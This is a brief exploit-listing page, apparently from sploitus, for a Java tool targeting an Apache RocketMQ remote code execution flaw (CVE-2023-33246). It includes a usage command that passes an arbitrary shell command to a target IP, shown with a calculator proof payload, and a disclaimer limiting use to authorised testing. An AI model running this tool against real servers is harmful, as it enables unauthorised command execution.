Share
## https://sploitus.com/exploit?id=09349575-44CD-5D4B-B352-46765F846AB1
# CVE-2023-33246
Apache RocketMQ 远程代码执行漏洞(CVE-2023-33246) Exploit

# 使用方法: 
java -jar CVE-2023-33246.jar -ip "127.0.0.1" -cmd "open -a calculator"

![image](https://github.com/Le1a/CVE-2023-33246/assets/97610822/dc60f6a0-7b39-411c-8908-1245e81e70df)


# 免责声明: 
检测工具仅供各大安全公司的安全测试员安全测试使用。未经允许请勿对任何外部计算机系统进行入侵攻击,不得用于任何非授权形式的安全测试。仅提供技术交流,不对工具造成任何理论上的或实际上的损失承担责任。